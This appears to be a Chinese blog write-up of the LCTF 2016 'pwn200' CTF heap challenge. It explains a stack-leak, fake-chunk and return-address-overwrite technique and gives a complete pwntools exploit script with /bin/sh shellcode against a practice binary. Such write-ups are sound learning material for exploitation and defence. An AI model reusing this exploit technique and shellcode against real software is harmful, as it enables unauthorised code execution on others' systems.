我的技术与生活——lctf2016_pwn200

lctf2016_pwn200

一道有点难的堆题

这是主函数的结构，当我们输入满0x40时能够把主函数的ebp的地址泄露出来

下面小a的末尾的rbp寄存器存着主函数的rbp

后面还调用了两个函数，说明这两个函数的栈帧离得不远，而这个函数，可以构造我们的fakechunk,还有我们的shellcode

shellcode第一个得是’\x00’防止复制过去，造成影响

申请得到得堆的地址和给过去的不太一样，这是构造的栈的结构

然后ptr指针的值被覆盖成栈上的，等我们free再malloc的时候就能申请到这，但是大小得是0x30，因为我们构造的fakechunk的大小是0x40的大小，这样才能malloc到我们的栈上，从而覆盖到返回地址，而返回地址得写成shellcode开始的地址。

shellcode的结构应该写出这样的结构。

1	payload=3*p64(0)+p64(rbp-0xc0+1)

再次申请覆盖掉返回地址，最后程序返回的时候会执行shellcode

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",28868)
p=process("./pwn200")

context.log_level="debug"
payload='a'*0x30
p.sendafter('u?',payload)
p.recvuntil('a'*0x30)
rbp=u64(p.recv(6).ljust(8,'\x00'))
print(hex(rbp))


shellcode="\x00\x31\xf6\x48\xbb\x2f\x62\x69\x6e"
shellcode+= "\x2f\x2f\x73\x68\x56\x53\x54\x5f"
shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05"

payload=(shellcode+2*p64(0)+p64(0X41)).ljust(0x38,'\x00')  #gouzhao fakebchunk
payload+=p64(rbp-0x90)


p.sendlineafter('id ~~?','31')

print(hex(rbp-0x90))

p.sendlineafter('money~',payload)

p.sendlineafter('choice : ','2')
#p.recvuntil('\n')
gdb.attach(p)
sleep(1)
p.sendlineafter('choice : ','1')


p.sendlineafter('long?','48')

payload=3*p64(0)+p64(rbp-0xc0+1)

p.sendlineafter('money : ',payload)

p.sendlineafter('choice : ','3')

#p.sendline(payload)

p.interactive()

站点信息

lctf2016_pwn200

lctf2016_pwn200

一道有点难的堆题

这是主函数的结构，当我们输入满0x40时能够把主函数的ebp的地址泄露出来

下面小a的末尾的rbp寄存器存着主函数的rbp

后面还调用了两个函数，说明这两个函数的栈帧离得不远，而这个函数，可以构造我们的fakechunk,还有我们的shellcode

shellcode第一个得是’\x00’防止复制过去，造成影响

申请得到得堆的地址和给过去的不太一样，这是构造的栈的结构

然后ptr指针的值被覆盖成栈上的，等我们free再malloc的时候就能申请到这，但是大小得是0x30，因为我们构造的fakechunk的大小是0x40的大小，这样才能malloc到我们的栈上，从而覆盖到返回地址，而返回地址得写成shellcode开始的地址。

shellcode的结构应该写出这样的结构。

再次申请覆盖掉返回地址，最后程序返回的时候会执行shellcode

评论区

目录

公告栏